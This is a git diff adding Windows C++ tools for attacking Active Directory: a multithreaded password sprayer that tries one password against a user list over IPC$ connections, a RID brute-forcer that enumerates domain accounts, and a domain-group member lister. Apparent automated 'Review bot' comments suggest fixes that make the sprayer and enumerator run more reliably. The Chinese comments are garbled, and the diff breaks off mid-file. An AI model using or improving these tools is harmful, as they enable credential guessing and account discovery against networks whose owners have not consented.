diff --git a/BlastDomainUserPwd/WNetApi.h b/BlastDomainUserPwd/WNetApi.h
new file mode 100644
index 0000000..d164fcd
--- /dev/null
+++ b/BlastDomainUserPwd/WNetApi.h
@@ -0,0 +1,25 @@
+#include "tou.h"
+#include "CommonApi.h"
+#pragma once
+class WNetApi
+{
+public:
+ // ipc
+ int WNetAddConnection2Api(LPWSTR lpRemoteName, LPWSTR lpDomainUserName, LPWSTR lpPassword);
+
+ // ɾipc
+ int WNetCancelConnection2Api(LPWSTR lpRemoteName);
+
+ // ȡб
+ std::vector NetGroupGetUsersApi(LPWSTR servername, LPWSTR groupname);
+
+ // гع
+ std::vector NetLocalGroupGetMembersApi(LPWSTR aliveIp);
+
+ // ̽
+ BOOL detectAlive(int i, LPWSTR ip);
+
+private:
+ CommonApi theCommonApi;
+
+};
\ No newline at end of file
diff --git a/BlastDomainUserPwd/tou.h b/BlastDomainUserPwd/tou.h
new file mode 100644
index 0000000..b25924b
--- /dev/null
+++ b/BlastDomainUserPwd/tou.h
@@ -0,0 +1,28 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+
+#include
+#include
+#include
+#include // WNetAddConnection2
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include //
+#include
+#include
+#include
+#include // std::
+
+#pragma comment(lib,"iphlpapi.lib") // ̽ sendarp
+#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, "mpr.lib") // WinnetҪĶ̬ӿ
+#pragma comment(lib, "Netapi32.lib") // WinnetҪĶ̬ӿ
+#pragma comment(lib, "Kernel32.lib")
\ No newline at end of file
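Review bot: tou.h has no include guard or `#pragma once`, yet it is included both directly and via CommonApi.h and WNetApi.h from the same translation unit; add `#pragma once` as the first line so the defines and `#pragma comment` directives are not reprocessed on every inclusion. `#define _CRT_SECURE_NO_WARNINGS` only silences the CRT deprecation warnings for calls such as `fopen` and `strtok` in the callers; using `fopen_s`/`strtok_s` there and dropping the define would address the warnings rather than hide them. The `UNICODE` guard here is repeated verbatim in BlastDomainUserPwd/源.cpp, which also includes this header, so one of the two copies is redundant.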
diff --git "a/BlastDomainUserPwd/\346\272\220.cpp" "b/BlastDomainUserPwd/\346\272\220.cpp"
new file mode 100644
index 0000000..13a7c45
--- /dev/null
+++ "b/BlastDomainUserPwd/\346\272\220.cpp"
@@ -0,0 +1,121 @@
+// EnuDomainUseröٳûбб
+#pragma once
+#ifndef UNICODE
+#define UNICODE
+#endif
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+
+#include "WNetApi.h"
+#include "CommonApi.h"
+#include "tou.h"
+#include "queue"
+
+#define BUFFSIZE 1024
+
+// ȫֱ
+WNetApi theWNetApi;
+CommonApi theCommonApi;
+std::mutex mtx; // ߳
+HANDLE hSuccessFile = theCommonApi.CreateFileApi(L"success.txt"); // ļ
+std::queue domainUsersQueue; // ûĶ
+
+void start(int i, LPWSTR lpRemoteName, LPWSTR lpDomainUserPassword) {
+
+ std::wstring domainUserName;
+ LPCWSTR lpDomainUserName;
+
+ while (!domainUsersQueue.empty())
+ {
+ if (mtx.try_lock())
+ {
+ domainUserName = domainUsersQueue.front(); // ȡһ
+ domainUsersQueue.pop(); // ɾһ
+ }
+ mtx.unlock();
+ lpDomainUserName = domainUserName.data();
+ // wprintf(L"[#%d] %s\n", i, lpDomainUserName);
+
+ if (theWNetApi.WNetAddConnection2Api(lpRemoteName, (LPWSTR)lpDomainUserName, lpDomainUserPassword) == 1) // Ϊû
+ {
+ theWNetApi.WNetCancelConnection2Api(lpRemoteName);
+ theCommonApi.saveIPCok(hSuccessFile, lpRemoteName, (LPWSTR)lpDomainUserName, lpDomainUserPassword);
+ }
+ else if (GetLastError() == 1219)
+ {
+ // һûʹһûԴĶӡж˷ԴӣȻһΡ
+ wprintf(L"[%s] multiple connections. try again. \n", lpDomainUserName);
+ domainUsersQueue.push(domainUserName); // Ҫ±ƣ
+ Sleep(1000);
+ }
+ else if (GetLastError() == 1326) {
+ // û벻ȷ
+ wprintf(L"[%s] The user name or password is incorrect. \n", lpDomainUserName);
+ }
+ else
+ {
+ wprintf(L"[%s] error : %d\n", lpDomainUserName, GetLastError());
+ }
+
+ }
+
+}
+
+int wmain(int argc, wchar_t* argv[])
+{
+ setlocale(LC_ALL, ""); //
+ if (argc != 5) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s \\\\192.168.52.29 domainUser.txt password 100\n", argv[0]);
+ wprintf(L" %s \\\\IP ûֵ ԱƵ ߳Ŀ\n", argv[0]);
+ exit(1);
+ }
+
+ LPWSTR lpRemoteName = argv[1]; // \\192.168.52.29
+ LPWSTR lpDomainUserFileName = argv[2]; // ûֵ: domainUser.txt
+ LPWSTR lpDomainUserPassword = argv[3]; // û: 1qaz@WSX
+ std::wstring wszThreadNum = argv[4]; // ߳Ŀ: 10
+
+ wprintf(L"lpRemoteName: %s\n", lpRemoteName);
+ wprintf(L"lpDomainUserFileName: %s\n", lpDomainUserFileName);
+ wprintf(L"lpDomainUserPassword: %s\n", lpDomainUserPassword);
+ wprintf(L"lpThreadNum: %s\n", wszThreadNum.data());
+ wprintf(L"------------------------------------------------------\n");
+
+
+ int iThreadNum = std::stoi(wszThreadNum.data());
+
+ FILE* pFile;
+ CHAR str1[BUFFSIZE];
+ LPWSTR str2;
+
+ if ((pFile = fopen(theCommonApi.UnicodeToAnsi(lpDomainUserFileName), "rt")) == NULL)
+ {
+ printf("ļʧ\n");
+ exit(0);
+ }
+
+ while (fgets(str1, BUFFSIZE, pFile))
+ {
+ str2 = theCommonApi.AnsiToUnicode(strtok(str1, "\n")); // ɾз
+ domainUsersQueue.push(str2);
+ }
+
+ // رļ
+ fclose(pFile);
+
+
+ // ߳
+ std::thread* Threads = new std::thread[iThreadNum];
+ for (int i = 0; i < iThreadNum; i++) {
+ Threads[i] = std::thread(start, i, lpRemoteName, lpDomainUserPassword);
+ }
+ for (int i = 0; i < iThreadNum; i++) {
+ Threads[i].join();
+ }
+ delete[] Threads;
+
+
+
+ return 0;
+
+}
\ No newline at end of file
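Review bot: In start, `mtx.unlock()` runs unconditionally after `if (mtx.try_lock())`, so a thread that failed to acquire the mutex unlocks one it does not own (undefined behavior for std::mutex) and then reuses the previous `domainUserName`, processing the same entry twice; the `domainUsersQueue.empty()` test in the loop condition and the `push` on the 1219 retry path also touch the queue with no lock held. Take the lock with a `std::lock_guard`, test for emptiness and pop inside the critical section, and hold the same lock around the re-push, as sketched below. Separately, WNetAddConnection2Api returns only 0/1 and discards the DWORD that WNetAddConnection2 returns, so the `GetLastError() == 1219` and `== 1326` branches depend on the API also setting the thread's last-error value, which the page does not establish — returning that DWORD from the wrapper would make the checks reliable. In wmain, `std::stoi` on a non-numeric or negative thread count throws or yields a negative array size with no handling, `strtok(str1, "\n")` returns NULL on a blank line and that NULL is passed straight to AnsiToUnicode, `hSuccessFile` is never closed, and `#pragma once` on line 2 of a .cpp file has no effect.
```cpp
    while (true)
    {
        {
            std::lock_guard<std::mutex> guard(mtx);
            if (domainUsersQueue.empty()) break;
            domainUserName = domainUsersQueue.front();
            domainUsersQueue.pop();
        }
        lpDomainUserName = domainUserName.data();
        // … unchanged: connection attempt and success branch …
        else if (GetLastError() == 1219)
        {
            // … unchanged: message …
            {
                std::lock_guard<std::mutex> guard(mtx);
                domainUsersQueue.push(domainUserName);
            }
            Sleep(1000);
        }
        // … unchanged: remaining error branches …
```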
diff --git a/EnuDomainUser/.gitignore b/EnuDomainUser/.gitignore
new file mode 100644
index 0000000..e645270
--- /dev/null
+++ b/EnuDomainUser/.gitignore
@@ -0,0 +1,353 @@
+## Ignore Visual Studio temporary files, build results, and
+## files generated by popular Visual Studio add-ons.
+##
+## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
+
+# User-specific files
+*.rsuser
+*.suo
+*.user
+*.userosscache
+*.sln.docstates
+
+# User-specific files (MonoDevelop/Xamarin Studio)
+*.userprefs
+
+# Mono auto generated files
+mono_crash.*
+
+# Build results
+[Dd]ebug/
+[Dd]ebugPublic/
+[Rr]elease/
+[Rr]eleases/
+x64/
+x86/
+[Aa][Rr][Mm]/
+[Aa][Rr][Mm]64/
+bld/
+[Bb]in/
+[Oo]bj/
+[Ll]og/
+[Ll]ogs/
+
+# Visual Studio 2015/2017 cache/options directory
+.vs/
+# Uncomment if you have tasks that create the project's static files in wwwroot
+#wwwroot/
+
+# Visual Studio 2017 auto generated files
+Generated\ Files/
+
+# MSTest test Results
+[Tt]est[Rr]esult*/
+[Bb]uild[Ll]og.*
+
+# NUnit
+*.VisualState.xml
+TestResult.xml
+nunit-*.xml
+
+# Build Results of an ATL Project
+[Dd]ebugPS/
+[Rr]eleasePS/
+dlldata.c
+
+# Benchmark Results
+BenchmarkDotNet.Artifacts/
+
+# .NET Core
+project.lock.json
+project.fragment.lock.json
+artifacts/
+
+# StyleCop
+StyleCopReport.xml
+
+# Files built by Visual Studio
+*_i.c
+*_p.c
+*_h.h
+*.ilk
+*.meta
+*.obj
+*.iobj
+*.pch
+*.pdb
+*.ipdb
+*.pgc
+*.pgd
+*.rsp
+*.sbr
+*.tlb
+*.tli
+*.tlh
+*.tmp
+*.tmp_proj
+*_wpftmp.csproj
+*.log
+*.vspscc
+*.vssscc
+.builds
+*.pidb
+*.svclog
+*.scc
+
+# Chutzpah Test files
+_Chutzpah*
+
+# Visual C++ cache files
+ipch/
+*.aps
+*.ncb
+*.opendb
+*.opensdf
+*.sdf
+*.cachefile
+*.VC.db
+*.VC.VC.opendb
+
+# Visual Studio profiler
+*.psess
+*.vsp
+*.vspx
+*.sap
+
+# Visual Studio Trace Files
+*.e2e
+
+# TFS 2012 Local Workspace
+$tf/
+
+# Guidance Automation Toolkit
+*.gpState
+
+# ReSharper is a .NET coding add-in
+_ReSharper*/
+*.[Rr]e[Ss]harper
+*.DotSettings.user
+
+# JustCode is a .NET coding add-in
+.JustCode
+
+# TeamCity is a build add-in
+_TeamCity*
+
+# DotCover is a Code Coverage Tool
+*.dotCover
+
+# AxoCover is a Code Coverage Tool
+.axoCover/*
+!.axoCover/settings.json
+
+# Visual Studio code coverage results
+*.coverage
+*.coveragexml
+
+# NCrunch
+_NCrunch_*
+.*crunch*.local.xml
+nCrunchTemp_*
+
+# MightyMoose
+*.mm.*
+AutoTest.Net/
+
+# Web workbench (sass)
+.sass-cache/
+
+# Installshield output folder
+[Ee]xpress/
+
+# DocProject is a documentation generator add-in
+DocProject/buildhelp/
+DocProject/Help/*.HxT
+DocProject/Help/*.HxC
+DocProject/Help/*.hhc
+DocProject/Help/*.hhk
+DocProject/Help/*.hhp
+DocProject/Help/Html2
+DocProject/Help/html
+
+# Click-Once directory
+publish/
+
+# Publish Web Output
+*.[Pp]ublish.xml
+*.azurePubxml
+# Note: Comment the next line if you want to checkin your web deploy settings,
+# but database connection strings (with potential passwords) will be unencrypted
+*.pubxml
+*.publishproj
+
+# Microsoft Azure Web App publish settings. Comment the next line if you want to
+# checkin your Azure Web App publish settings, but sensitive information contained
+# in these scripts will be unencrypted
+PublishScripts/
+
+# NuGet Packages
+*.nupkg
+# NuGet Symbol Packages
+*.snupkg
+# The packages folder can be ignored because of Package Restore
+**/[Pp]ackages/*
+# except build/, which is used as an MSBuild target.
+!**/[Pp]ackages/build/
+# Uncomment if necessary however generally it will be regenerated when needed
+#!**/[Pp]ackages/repositories.config
+# NuGet v3's project.json files produces more ignorable files
+*.nuget.props
+*.nuget.targets
+
+# Microsoft Azure Build Output
+csx/
+*.build.csdef
+
+# Microsoft Azure Emulator
+ecf/
+rcf/
+
+# Windows Store app package directories and files
+AppPackages/
+BundleArtifacts/
+Package.StoreAssociation.xml
+_pkginfo.txt
+*.appx
+*.appxbundle
+*.appxupload
+
+# Visual Studio cache files
+# files ending in .cache can be ignored
+*.[Cc]ache
+# but keep track of directories ending in .cache
+!?*.[Cc]ache/
+
+# Others
+ClientBin/
+~$*
+*~
+*.dbmdl
+*.dbproj.schemaview
+*.jfm
+*.pfx
+*.publishsettings
+orleans.codegen.cs
+
+# Including strong name files can present a security risk
+# (https://github.com/github/gitignore/pull/2483#issue-259490424)
+#*.snk
+
+# Since there are multiple workflows, uncomment next line to ignore bower_components
+# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
+#bower_components/
+
+# RIA/Silverlight projects
+Generated_Code/
+
+# Backup & report files from converting an old project file
+# to a newer Visual Studio version. Backup files are not needed,
+# because we have git ;-)
+_UpgradeReport_Files/
+Backup*/
+UpgradeLog*.XML
+UpgradeLog*.htm
+ServiceFabricBackup/
+*.rptproj.bak
+
+# SQL Server files
+*.mdf
+*.ldf
+*.ndf
+
+# Business Intelligence projects
+*.rdl.data
+*.bim.layout
+*.bim_*.settings
+*.rptproj.rsuser
+*- [Bb]ackup.rdl
+*- [Bb]ackup ([0-9]).rdl
+*- [Bb]ackup ([0-9][0-9]).rdl
+
+# Microsoft Fakes
+FakesAssemblies/
+
+# GhostDoc plugin setting file
+*.GhostDoc.xml
+
+# Node.js Tools for Visual Studio
+.ntvs_analysis.dat
+node_modules/
+
+# Visual Studio 6 build log
+*.plg
+
+# Visual Studio 6 workspace options file
+*.opt
+
+# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
+*.vbw
+
+# Visual Studio LightSwitch build output
+**/*.HTMLClient/GeneratedArtifacts
+**/*.DesktopClient/GeneratedArtifacts
+**/*.DesktopClient/ModelManifest.xml
+**/*.Server/GeneratedArtifacts
+**/*.Server/ModelManifest.xml
+_Pvt_Extensions
+
+# Paket dependency manager
+.paket/paket.exe
+paket-files/
+
+# FAKE - F# Make
+.fake/
+
+# CodeRush personal settings
+.cr/personal
+
+# Python Tools for Visual Studio (PTVS)
+__pycache__/
+*.pyc
+
+# Cake - Uncomment if you are using it
+# tools/**
+# !tools/packages.config
+
+# Tabs Studio
+*.tss
+
+# Telerik's JustMock configuration file
+*.jmconfig
+
+# BizTalk build output
+*.btp.cs
+*.btm.cs
+*.odx.cs
+*.xsd.cs
+
+# OpenCover UI analysis results
+OpenCover/
+
+# Azure Stream Analytics local run output
+ASALocalRun/
+
+# MSBuild Binary and Structured Log
+*.binlog
+
+# NVidia Nsight GPU debugger configuration file
+*.nvuser
+
+# MFractors (Xamarin productivity tool) working folder
+.mfractor/
+
+# Local History for Visual Studio
+.localhistory/
+
+# BeatPulse healthcheck temp database
+healthchecksdb
+
+# Backup folder for Package Reference Convert tool in Visual Studio 2017
+MigrationBackup/
+
+# Ionide (cross platform F# VS Code tools) working folder
+.ionide/
diff --git a/EnuDomainUser/EnuDomainUser.vcxproj b/EnuDomainUser/EnuDomainUser.vcxproj
new file mode 100644
index 0000000..0d8c2cb
--- /dev/null
+++ b/EnuDomainUser/EnuDomainUser.vcxproj
@@ -0,0 +1,147 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {4B7BF7AA-B163-4673-B969-AF6074688F46}
+ EnuDomainUser
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v110_xp
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ false
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+ MultiThreaded
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/EnuDomainUser/EnuDomainUser.vcxproj.filters b/EnuDomainUser/EnuDomainUser.vcxproj.filters
new file mode 100644
index 0000000..2453f19
--- /dev/null
+++ b/EnuDomainUser/EnuDomainUser.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/EnuDomainUser/\346\272\220.cpp" "b/EnuDomainUser/\346\272\220.cpp"
new file mode 100644
index 0000000..f05041f
--- /dev/null
+++ "b/EnuDomainUser/\346\272\220.cpp"
@@ -0,0 +1,246 @@
+// £ûȨޣأУIPCӼöû
+#pragma once
+#ifndef UNICODE
+#define UNICODE
+#endif
+#define _CRT_SECURE_NO_WARNINGS // ȫ
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include //
+
+#define BUFFSIZE 1024
+
+std::mutex mtx;
+int StartSid;
+
+// ַָ
+std::wstring splitString(std::wstring strSrc, std::wstring pattern)
+{
+ std::wstring result;
+ // ַԽȡһ
+ std::wstring strcom = strSrc.append(pattern);
+ // wprintf(L"%s\n", strcom);
+ auto pos = strSrc.find(pattern);
+ auto len = strcom.size();
+
+ // wprintf(L"%d", std::wstring::npos);
+ while (pos != std::wstring::npos)
+ {
+ std::wstring coStr = strcom.substr(0, pos);
+
+ strcom = strcom.substr(pos + pattern.size(), len);
+ pos = strcom.find(pattern);
+
+ if (pos == -1)
+ {
+ break;
+ }
+ result.append(coStr);
+ result.append(L"-");
+ }
+
+ return result;
+}
+
+// ȡadministratorsid
+BOOL user2sid(LPCTSTR lpSystemName, LPCTSTR lpAccountName, PSID Sid)
+{
+ // LPCTSTR lpSystemName = lpSystemName; // TEXT("192.168.52.2");
+ // LPCTSTR lpAccountName = lpAccountName; // û TEXT("hack\\administrator");
+ PSID pSid = Sid;
+ DWORD cbSid = 1; // SidĴС
+
+ WCHAR ReferencedDomainName[BUFFSIZE];
+ ZeroMemory(ReferencedDomainName, BUFFSIZE);
+ DWORD cchReferencedDomainName = 1;
+
+ UCHAR buffer[4];
+ PSID_NAME_USE peUse = (PSID_NAME_USE)buffer; // ָPSID_NAME_USEֵָʾʻͣıָ
+
+ BOOL bRtnBool = TRUE;
+
+ // һִΪ˻ȡcbSidcchReferencedDomainNameֵ
+ bRtnBool = LookupAccountName(
+ lpSystemName, //
+ lpAccountName, // û
+ pSid,
+ (LPDWORD)&cbSid,
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse);
+ // wprintf(L"cbSid:%d\ncchReferencedDomainName:%d\n", cbSid, cchReferencedDomainName);
+
+ // ڶִǻȡpSidΪҪһcbSidcchReferencedDomainName
+ bRtnBool = LookupAccountName(
+ lpSystemName,
+ lpAccountName,
+ pSid,
+ (LPDWORD)&cbSid,
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse);
+
+ if (bRtnBool == TRUE)
+ {
+ return TRUE;
+ }
+ else
+ {
+ printf("Error : %d\n", GetLastError());
+ }
+ return FALSE;
+};
+
+// ͨsidû
+std::wstring sid2user(PSID Sid, LPCTSTR lpSystemName)
+{
+ // LPCTSTR lpSystemName = TEXT("192.168.3.142"); //
+ PSID pSid = Sid; // SID
+
+ WCHAR Name[BUFFSIZE]; // sidû
+ ZeroMemory(Name, BUFFSIZE); // ڴ
+ DWORD cchName = 1; // NameĻС
+
+ WCHAR ReferencedDomainName[BUFFSIZE];
+ ZeroMemory(ReferencedDomainName, BUFFSIZE); // ڴ
+ DWORD cchReferencedDomainName = 1; // ReferencedDomainNameĻС
+
+ UCHAR buffer[4];
+ PSID_NAME_USE peUse = (PSID_NAME_USE)buffer; // ָPSID_NAME_USEֵָʾʻͣıָ
+
+ BOOL bRtnBool = TRUE;
+ // һִΪ˻ȡcchNamecchReferencedDomainName
+ bRtnBool = LookupAccountSid(
+ lpSystemName,
+ pSid,
+ Name,
+ (LPDWORD)&cchName,
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse);
+
+ // wprintf(L"cchName:%d\cchReferencedDomainName:%d\n", cchName, cchReferencedDomainName);
+
+ // ڶִǻȡNameΪҪһcchNamecchReferencedDomainName
+ bRtnBool = LookupAccountSid(
+ lpSystemName, // name of local or remote computer
+ pSid, // security identifier
+ Name, // account name buffer
+ (LPDWORD)&cchName, // size of account name buffer
+ ReferencedDomainName,
+ (LPDWORD)&cchReferencedDomainName,
+ peUse); // SID type
+
+
+ if (bRtnBool == TRUE)
+ {
+ std::wstring domainUser;
+ domainUser = (std::wstring)ReferencedDomainName + L"\\" + (std::wstring)Name;
+ // wprintf(L"%s\\%s\n", ReferencedDomainName, Name);
+ return domainUser;
+ }
+ else
+ {
+ // printf("error: %d\n", GetLastError());
+ return L"";
+ }
+
+
+};
+
+// ʼö
+void start(int i, std::wstring userSidPrefix, int iEndSid, LPCTSTR lpSystemName)
+{
+
+ while (StartSid <= iEndSid)
+ {
+ int num = 0;
+ if (mtx.try_lock()) //
+ {
+ num = StartSid;
+ ++StartSid;
+ mtx.unlock(); //
+ }
+
+ std::wstring domainUser;
+ PSID pSid2;
+ std::wstring a = std::to_wstring(num);
+ std::wstring userSid;
+ userSid = userSidPrefix + a; // ƴӳsid
+ // wprintf(L"%s\t", userSid.data());
+ ConvertStringSidToSid((LPCWSTR)userSid.data(), &pSid2); // ַתΪSid
+ domainUser = sid2user(pSid2, lpSystemName);
+
+ if (domainUser != L"")
+ {
+ wprintf(L"[%d] %s\n", num, domainUser.data());
+ }
+ delete pSid2;
+ // Sleep(2000);
+ }
+
+}
+
+int wmain(int argc, wchar_t* argv[])
+{
+ setlocale(LC_ALL, ""); //
+ if (argc != 6) {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s \\\\192.168.52.2 hack\\administrator 1000 2000 100\n", argv[0]);
+ wprintf(L" %s \\\\IP \\û<Ĭadministrator> ʼSid ĩβSid ߳Ŀ\n", argv[0]);
+ exit(0);
+ }
+
+ LPCTSTR lpSystemName = argv[1]; // IP
+ LPCTSTR lpAccountName = argv[2]; // hack\\administrator
+ std::wstring wszStartSid = argv[3]; // ʼSid
+ std::wstring wszEndSid = argv[4]; // ĩβSid
+ std::wstring wszThreadNum = argv[5]; // ߳Ŀ
+ int iStartSid = std::stoi(wszStartSid.data());
+ int iEndSid = std::stoi(wszEndSid.data());
+ int iThreadNum = std::stoi(wszThreadNum.data());
+ wprintf(L"DC-IP: %s\n", lpSystemName);
+ wprintf(L"domainname\\username: %s\n", lpAccountName);
+ wprintf(L"start Sid: %d\n", iStartSid);
+ wprintf(L"end Sid: %d\n", iEndSid);
+ wprintf(L"t_num: %d\n", iThreadNum);
+ wprintf(L"------------------------------------------------------\n");
+
+ StartSid = iStartSid; // ȫֱ
+
+ PSID Sid;
+ UCHAR buffer1[2048];
+ Sid = buffer1;
+
+ if (!user2sid(lpSystemName, lpAccountName, Sid))
+ {
+ wprintf(L"user2sid error!");
+ exit(0);
+ };
+
+ LPWSTR sid;
+ ConvertSidToStringSid(Sid, &sid); // SidתΪַ
+ wprintf(L"%s sid: %s\n", lpAccountName, sid);
+
+ std::wstring userSidPrefix; // sidǰ S-1-5-21-675012476-827261145-2327888524-
+ userSidPrefix = splitString(sid, L"-");
+ wprintf(L"sid Prefix: %s\n", userSidPrefix);
+
+ wprintf(L"------------------------------------------------------\n");
+
+ std::thread* Threads = new std::thread[iThreadNum];
+ for (int i = 0; i < iThreadNum; i++)
+ Threads[i] = std::thread(start, i, userSidPrefix, iEndSid, lpSystemName);
+ for (int i = 0; i < iThreadNum; i++)
+ Threads[i].join();
+ delete[] Threads;
+
+ wprintf(L"EnuDomainUser End!\n");
+}
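Review bot: `delete pSid2;` at the end of start()'s loop releases memory that ConvertStringSidToSid obtained through LocalAlloc, which is the wrong deallocator and undefined behavior; it should be `if (pSid2) LocalFree(pSid2);`, and the call's return value is never checked, so on failure sid2user is handed an indeterminate pointer. wmain has the matching leak — the `sid` string from ConvertSidToStringSid is never passed to LocalFree — and `wprintf(L"sid Prefix: %s\n", userSidPrefix)` passes a std::wstring object to `%s` instead of `userSidPrefix.c_str()`, which is also undefined behavior. In start(), when `mtx.try_lock()` fails `num` keeps its initial value of 0 while `StartSid` is read outside the lock in the while condition, so the body runs with a bogus index; a `std::lock_guard<std::mutex>` around the read-and-increment removes both the race and the fall-through. `iThreadNum` is never validated, so a zero or negative value reaches `new std::thread[iThreadNum]`.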
diff --git a/NetGroupGetUsers/NetGroupGetUsers.vcxproj b/NetGroupGetUsers/NetGroupGetUsers.vcxproj
new file mode 100644
index 0000000..308a650
--- /dev/null
+++ b/NetGroupGetUsers/NetGroupGetUsers.vcxproj
@@ -0,0 +1,146 @@
+
+
+
+
+ Debug
+ Win32
+
+
+ Release
+ Win32
+
+
+ Debug
+ x64
+
+
+ Release
+ x64
+
+
+
+ 16.0
+ {6A90FBC9-89AF-4284-B984-5C33DC1D1864}
+ NetGroupGetUsers
+ 10.0
+
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+ Application
+ true
+ v142
+ Unicode
+
+
+ Application
+ false
+ v142
+ true
+ Unicode
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ true
+
+
+ true
+
+
+ false
+
+
+ false
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+ Level3
+ true
+ true
+ true
+ NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
+ true
+
+
+ Console
+ true
+ true
+ true
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/NetGroupGetUsers/NetGroupGetUsers.vcxproj.filters b/NetGroupGetUsers/NetGroupGetUsers.vcxproj.filters
new file mode 100644
index 0000000..2934970
--- /dev/null
+++ b/NetGroupGetUsers/NetGroupGetUsers.vcxproj.filters
@@ -0,0 +1,22 @@
+
+
+
+
+ {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
+ cpp;c;cc;cxx;c++;def;odl;idl;hpj;bat;asm;asmx
+
+
+ {93995380-89BD-4b04-88EB-625FBE52EBFB}
+ h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
+
+
+ {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
+ rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
+
+
+
+
+ 源文件
+
+
+
\ No newline at end of file
diff --git "a/NetGroupGetUsers/\346\272\220.cpp" "b/NetGroupGetUsers/\346\272\220.cpp"
new file mode 100644
index 0000000..d1aa189
--- /dev/null
+++ "b/NetGroupGetUsers/\346\272\220.cpp"
@@ -0,0 +1,45 @@
+#ifndef UNICODE
+#define UNICODE
+#endif
+#pragma comment(lib, "Netapi32.lib") // WinnetҪĶ̬ӿ
+
+#include
+#include
+#include
+
+int wmain(int argc, wchar_t* argv[])
+{
+ if (argc != 3)
+ {
+ wprintf(L"Usage: %s \n", argv[0]);
+ wprintf(L" %s \"domain admins\" \\\\192.168.232.128", argv[0]);
+ exit(1);
+ }
+
+ wprintf(L"groupname: %s\n", argv[1]);
+ wprintf(L"servername: %s\n", argv[2]);
+ LPCWSTR servername = argv[2];
+ LPCWSTR groupname = argv[1];
+ DWORD dwLevel = 1;
+ GROUP_USERS_INFO_1* bufptr;
+ DWORD dwPrefmaxlen = MAX_PREFERRED_LENGTH;
+ DWORD dwEntriesread;
+ DWORD dwTotalentries;
+ DWORD dwRetVul;
+
+ dwRetVul = NetGroupGetUsers(servername, groupname, dwLevel, (LPBYTE*)&bufptr, dwPrefmaxlen, &dwEntriesread, &dwTotalentries, NULL);
+
+ wprintf(L"num: %d\n", dwEntriesread);
+
+ if (dwRetVul == NO_ERROR)
+ {
+ for (DWORD i = 0; i < dwEntriesread; i++)
+ {
+ wprintf(L"[%u] %s \n", i, bufptr[i].grui1_name);
+ }
+ }
+ else
+ {
+ wprintf(L"error : %u\nhttps://docs.microsoft.com/en-us/windows/win32/netmgmt/network-management-error-codes", dwRetVul);
+ }
+}
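Review bot: `bufptr` returned by NetGroupGetUsers is never released with NetApiBufferFree, and `dwEntriesread` is printed at `wprintf(L"num: %d\n", dwEntriesread)` before the status is checked, so on a failed call it prints an uninitialized stack value. Move the count print inside the `NO_ERROR` branch, add `NetApiBufferFree(bufptr);` after the loop, and use `%u` for the DWORD. The same missing NetApiBufferFree appears in NetLocalGroupEnum/源.cpp and NetLocalGroupGetMembers/源.cpp.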
\ No newline at end of file
diff --git a/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj b/NetLocalGroupEnum/NetLocalGroupEnum.vcxproj
new file mode 100644
index 0000000..0d01dfa
--- /dev/null
